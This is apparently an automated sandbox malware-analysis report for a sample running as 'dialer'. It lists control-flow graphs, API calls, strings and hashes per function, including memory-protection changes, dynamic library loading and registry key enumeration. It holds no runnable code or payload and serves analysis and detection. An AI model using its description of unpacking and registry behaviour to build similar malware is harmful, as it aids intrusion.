429->424 431 140002bb5-140002bc8 430->431 432 140002f7f-140002f9b call 140001370 430->432 433 140002be5-140002eeb wcslen call 1400014a9 * 2 call 1400014f4 call 1400014c7 * 2 call 14000145e * 3 431->433 434 140002bca-140002bde 431->434 432->401 453 140002eed-140002f0b call 140001512 433->453 454 140002f10-140002f38 call 14000145e 433->454 434->433 453->454
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: wcslen$memset$wcscatwcscpywcsncmp
                                                                                                                                                                                                      • String ID: 0$X$\BaseNamedObjects\llfrvfnuexbwtixr$`
                                                                                                                                                                                                      • API String ID: 780471329-2690498009
                                                                                                                                                                                                      • Opcode ID: 344dc0d2555831cfefea67499faefd1bc7ea92048f0324c41f2eb0cd16c79055
                                                                                                                                                                                                      • Instruction ID: 7be09ba941ed68ffb1b3850f8175c83daa3bfaa79e8fc9c002dedc83ab5f35de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 344dc0d2555831cfefea67499faefd1bc7ea92048f0324c41f2eb0cd16c79055
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90125AB2608BC481E762CB26F8443EAB7A4F789794F414215EBA957BF5DF78C189C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2643109117-0
                                                                                                                                                                                                      • Opcode ID: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
                                                                                                                                                                                                      • Instruction ID: 145ef27ce15272fb8ed355f5aa63f0c9a1f5ede9e4593ea7d6eb0f0a7906d2e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b749f654d0317d9e24de8ca2bf6692fcf531ea681135a2e2bde356a6ec223b5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F55111F1611A4085FB16EF27F9947EA27A1BB8DBD0F449121FB4E873B2DE3884958700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 499 140001ba0-140001bc0 500 140001bc2-140001bd7 499->500 501 140001c09 499->501 502 140001be9-140001bf1 500->502 503 140001c0c-140001c17 call 1400023b0 501->503 504 140001bf3-140001c02 502->504 505 140001be0-140001be7 502->505 510 140001cf4-140001cfe call 140001d40 503->510 511 140001c1d-140001c6c call 1400024d0 VirtualQuery 503->511 504->505 507 140001c04 504->507 505->502 505->503 509 140001cd7-140001cf3 memcpy 507->509 515 140001d03-140001d1e call 140001d40 510->515 511->515 517 140001c72-140001c79 511->517 518 140001d23-140001d38 GetLastError call 140001d40 515->518 519 140001c7b-140001c7e 517->519 520 140001c8e-140001c97 517->520 522 140001cd1 519->522 523 140001c80-140001c83 519->523 524 140001ca4-140001ccf VirtualProtect 520->524 525 140001c99-140001c9c 520->525 522->509 523->522 527 140001c85-140001c8a 523->527 524->518 524->522 525->522 528 140001c9e 525->528 527->522 529 140001c8c 527->529 528->524 529->528
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001C63
                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001CC7
                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0000000140001CE0
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,0000000140007DE8,0000000140007DE8,?,?,0000000140000000,?,0000000140001991), ref: 0000000140001D23
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                                                                                                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                                                                                                                                                      • API String ID: 2595394609-2123141913
                                                                                                                                                                                                      • Opcode ID: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
                                                                                                                                                                                                      • Instruction ID: 2ed46510ed1d0a58bb00a12b4a38f7601a8ffa55d26e4d8577210080af0f0105
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28aadb8de5dc709acd0a0e5d247f6037aa628613dfc42422a511b90ca232dc4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 064132B1601A4486FA66DF57F884BE927A0F78DBC4F554126EF0E877B1DA38C586C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140002104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 530 140002104-14000210b 531 140002111-140002128 EnterCriticalSection 530->531 532 140002218-140002221 530->532 535 14000220b-140002212 LeaveCriticalSection 531->535 536 14000212e-14000213c 531->536 533 140002272-140002280 532->533 534 140002223-14000222d 532->534 537 140002241-140002263 DeleteCriticalSection 534->537 538 14000222f 534->538 535->532 539 14000214d-140002159 TlsGetValue GetLastError 536->539 537->533 540 140002230-14000223f free 538->540 541 14000215b-14000215e 539->541 542 140002140-140002147 539->542 540->537 540->540 541->542 543 140002160-14000216d 541->543 542->535 542->539 543->542
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3326252324-0
                                                                                                                                                                                                      • Opcode ID: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
                                                                                                                                                                                                      • Instruction ID: 9494385bac82c96470a5ad2ca80031d016a952209e6f2660f35a807c86e33b41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc48a205a360e40ccc39e5e09ba110344913a208c188809db43705c9a7f6a856
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9121F5B0305A0192FA6BDB53F9483E823A4BB6CBD0F444121FF5A476B4DB79C986C300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 545 140001e10-140001e2d 546 140001e3e-140001e48 545->546 547 140001e2f-140001e38 545->547 549 140001ea3-140001ea8 546->549 550 140001e4a-140001e53 546->550 547->546 548 140001f60-140001f69 547->548 549->548 553 140001eae-140001eb3 549->553 551 140001e55-140001e60 550->551 552 140001ecc-140001ed1 550->552 551->549 554 140001f23-140001f2d 552->554 555 140001ed3-140001ee2 signal 552->555 556 140001eb5-140001eba 553->556 557 140001efb-140001f0a call 140006be0 553->557 560 140001f43-140001f45 554->560 561 140001f2f-140001f3f 554->561 555->554 558 140001ee4-140001ee8 555->558 556->548 562 140001ec0 556->562 557->554 566 140001f0c-140001f10 557->566 563 140001eea-140001ef9 signal 558->563 564 140001f4e-140001f53 558->564 560->548 561->560 562->554 563->548 567 140001f5a 564->567 568 140001f12-140001f21 signal 566->568 569 140001f55 566->569 567->548 568->548 569->567
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: CCG
                                                                                                                                                                                                      • API String ID: 0-1584390748
                                                                                                                                                                                                      • Opcode ID: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                                                                                                                                                      • Instruction ID: 0d0cdd76e27464eab58c3101b34b7ecc2a8ef26ebffc61dfa6a838f535d4530f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e97456c2db4c566f3d7dc493090a254b32206473731b29f9c59ef8b921ac1576
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E2159B1A0510542FA77DA2BB5903F92182ABCC7E4F258635FF19873F5DF7888C28241
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 570 140001880-14000189c 571 1400018a2-1400018f9 call 140002420 call 140002660 570->571 572 140001a0f-140001a1f 570->572 571->572 577 1400018ff-140001910 571->577 578 140001912-14000191c 577->578 579 14000193e-140001941 577->579 581 14000194d-140001954 578->581 582 14000191e-140001929 578->582 580 140001943-140001947 579->580 579->581 580->581 584 140001a20-140001a26 580->584 585 140001956-140001961 581->585 586 14000199e-1400019a6 581->586 582->581 583 14000192b-14000193a 582->583 583->579 589 140001b87-140001b98 call 140001d40 584->589 590 140001a2c-140001a37 584->590 587 140001970-14000199c call 140001ba0 585->587 586->572 588 1400019a8-1400019c1 586->588 587->586 594 1400019df-1400019e7 588->594 590->586 591 140001a3d-140001a5f 590->591 595 140001a7d-140001a97 591->595 596 1400019e9-140001a0d VirtualProtect 594->596 597 1400019d0-1400019dd 594->597 600 140001b74-140001b82 call 140001d40 595->600 601 140001a9d-140001afa 595->601 596->597 597->572 597->594 600->589 607 140001b22-140001b26 601->607 608 140001afc-140001b0e 601->608 611 140001b2c-140001b30 607->611 612 140001a70-140001a77 607->612 609 140001b5c-140001b6c 608->609 610 140001b10-140001b20 608->610 609->600 614 140001b6f call 140001d40 609->614 610->607 610->609 611->612 613 140001b36-140001b57 call 140001ba0 611->613 612->586 612->595 613->609 614->600
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000140001247), ref: 00000001400019F9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                      • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                                                                                                                                                      • API String ID: 544645111-395989641
                                                                                                                                                                                                      • Opcode ID: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                                                                                                                      • Instruction ID: 78106683dca420d487733eb45b5c7fb140555e26720c20ee5b0ca44718aa059e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7818cc2df225a017ff44da82892a3b8f66bcfae0520395024c1ab092e30cd3b9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F05105B6B11544DAEB16CF67F840BD82761A759BE8F548211FB19077B4DB38C586C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000000140001800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 618 140001800-140001810 619 140001812-140001822 618->619 620 140001824 618->620 621 14000182b-140001867 call 140002290 fprintf 619->621 620->621
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: fprintf
                                                                                                                                                                                                      • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                                                      • API String ID: 383729395-3474627141
                                                                                                                                                                                                      • Opcode ID: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                                                                                                                                                      • Instruction ID: 497f2bda4b805bebb598d258fe75f44a47035596d1a2b2a7541446a23c8471c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca6b003e7d5e4c1f7dddf901e9dd9bc29e86f15a224b0f641e9277e05f257cb0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0F671A14A4482E212EF2AB9413ED6360E74D3C0F40D211FF4DA32A1DF3CD182C310
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 000000014000219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 624 14000219e-1400021a5 625 140002272-140002280 624->625 626 1400021ab-1400021c2 EnterCriticalSection 624->626 627 140002265-14000226c LeaveCriticalSection 626->627 628 1400021c8-1400021d6 626->628 627->625 629 1400021e9-1400021f5 TlsGetValue GetLastError 628->629 630 1400021f7-1400021fa 629->630 631 1400021e0-1400021e7 629->631 630->631 632 1400021fc-140002209 630->632 631->627 631->629 632->631
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000050.00000002.2453303089.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000050.00000002.2452907541.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2455357604.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2461620712.0000000140009000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000050.00000002.2462515654.000000014000A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_80_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 682475483-0
                                                                                                                                                                                                      • Opcode ID: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                                                                                                                      • Instruction ID: 8e95c5bf1582c2fa6f49c61d441952bd59d504a178f2dce2e4bc026802320bcf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87f9ce1bbc68f519e9da004e6316be91bec518300aea1fdf9716aad2947da55c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6501F2B5305A0082FA2BDB53FE083D82364BB6CBD0F454021EF0943AB4DB79C996C300
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:56.2%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:87.5%
                                                                                                                                                                                                      Total number of Nodes:8
                                                                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                                                                      Callgraph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      • Opacity -> Relevance
                                                                                                                                                                                                      • Disassembly available
                                                                                                                                                                                                      callgraph 0 Function_0000000140846321 1 Function_00000001408460B2 2 Function_00000001408460F0 2->0 2->1 3 Function_0000000140846070 3->2

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00000001408460F0 Relevance: 6.2, APIs: 4, Instructions: 209memorylibraryCOMMON
                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 0 1408460f0-1408460f3 1 1408460fd-140846101 0->1 2 140846103-14084610b 1->2 3 14084610d 1->3 2->3 4 1408460f5-1408460fa 3->4 5 14084610f-140846112 3->5 4->1 6 14084611b-140846122 5->6 8 140846124-14084612c 6->8 9 14084612e 6->9 8->9 10 140846114-140846119 9->10 11 140846130-140846133 9->11 10->6 12 140846135-140846143 11->12 13 14084614e-140846150 11->13 15 140846145-14084614a 12->15 16 14084619d-1408461bc 12->16 17 140846152-140846158 13->17 18 14084615a 13->18 20 140846184-140846187 15->20 22 14084614c 15->22 19 1408461ed-1408461f0 16->19 17->18 18->20 21 14084615c-140846160 18->21 25 1408461f5-1408461fb 19->25 26 1408461f2-1408461f3 19->26 33 140846189-140846198 call 1408460b2 20->33 23 140846162-140846168 21->23 24 14084616a 21->24 22->21 23->24 24->20 27 14084616c-140846173 24->27 30 140846202-140846206 25->30 28 1408461d4-1408461d8 26->28 44 140846175-14084617b 27->44 45 14084617d 27->45 31 1408461be-1408461c1 28->31 32 1408461da-1408461dd 28->32 34 140846208-140846220 LoadLibraryA 30->34 35 14084625e-140846266 30->35 31->25 36 1408461c3 31->36 32->25 39 1408461df-1408461e3 32->39 33->1 41 140846222-140846229 34->41 38 14084626a-140846273 35->38 43 1408461c4-1408461c8 36->43 46 140846275-140846277 38->46 47 1408462a2-140846302 VirtualProtect * 2 call 140846321 38->47 39->43 48 1408461e5-1408461ec 39->48 41->30 42 14084622b 41->42 50 140846237-14084623f 42->50 51 14084622d-140846235 42->51 43->28 52 1408461ca-1408461cc 43->52 44->45 45->27 53 14084617f-140846182 45->53 54 140846279-140846288 46->54 55 14084628a-140846298 46->55 60 140846307-14084630c 47->60 48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000051.00000002.2453295770.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000051.00000002.2452848971.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2453295770.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2453295770.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2453295770.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2453295770.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2453295770.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2453295770.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000051.00000002.2723965111.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_81_2_140000000_dialer.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1941872368-0
                                                                                                                                                                                                      • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                                                                                                                                      • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:2.6%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                      Signature Coverage:1.1%
                                                                                                                                                                                                      Total number of Nodes:1796
                                                                                                                                                                                                      Total number of Limit Nodes:12
                                                                                                                                                                                                      execution_graph 7570 28092383ab9 7571 28092383a06 7570->7571 7572 28092383a56 VirtualQuery 7571->7572 7573 28092383a70 7571->7573 7574 28092383a8a VirtualAlloc 7571->7574 7572->7571 7572->7573 7574->7573 7575 28092383abb GetLastError 7574->7575 7575->7571 7575->7573 7698 280923858b9 7699 280923858c0 VirtualProtect 7698->7699 7700 280923858e9 GetLastError 7699->7700 7701 280923857d0 7699->7701 7700->7701 7576 28092381abc 7581 28092381628 GetProcessHeap 7576->7581 7578 28092381ad2 Sleep SleepEx 7579 28092381acb 7578->7579 7579->7578 7580 28092381598 StrCmpIW StrCmpW 7579->7580 7580->7579 7582 28092381648 __std_exception_copy 7581->7582 7626 28092381268 GetProcessHeap 7582->7626 7584 28092381650 7585 28092381268 2 API calls 7584->7585 7586 28092381661 7585->7586 7587 28092381268 2 API calls 7586->7587 7588 2809238166a 7587->7588 7589 28092381268 2 API calls 7588->7589 7590 28092381673 7589->7590 7591 2809238168e RegOpenKeyExW 7590->7591 7592 280923816c0 RegOpenKeyExW 7591->7592 7593 280923818a6 7591->7593 7594 280923816e9 7592->7594 7595 280923816ff RegOpenKeyExW 7592->7595 7593->7579 7637 280923812bc RegQueryInfoKeyW 7594->7637 7597 2809238173a RegOpenKeyExW 7595->7597 7598 28092381723 7595->7598 7601 2809238175e 7597->7601 7602 28092381775 RegOpenKeyExW 7597->7602 7630 2809238104c RegQueryInfoKeyW 7598->7630 7606 280923812bc 13 API calls 7601->7606 7603 28092381799 7602->7603 7604 280923817b0 RegOpenKeyExW 7602->7604 7608 280923812bc 13 API calls 7603->7608 7609 280923817eb RegOpenKeyExW 7604->7609 7610 280923817d4 7604->7610 7607 2809238176b RegCloseKey 7606->7607 7607->7602 7611 280923817a6 RegCloseKey 7608->7611 7613 2809238180f 7609->7613 7614 28092381826 RegOpenKeyExW 7609->7614 7612 280923812bc 13 API calls 7610->7612 7611->7604 7615 280923817e1 RegCloseKey 7612->7615 7616 2809238104c 5 API calls 7613->7616 7617 2809238184a 7614->7617 7618 28092381861 RegOpenKeyExW 7614->7618 7615->7609 7621 2809238181c RegCloseKey 7616->7621 7622 2809238104c 5 API calls 7617->7622 7619 2809238189c RegCloseKey 7618->7619 7620 28092381885 7618->7620 7619->7593 7624 2809238104c 5 API calls 7620->7624 7621->7614 7623 28092381857 RegCloseKey 7622->7623 7623->7618 7625 28092381892 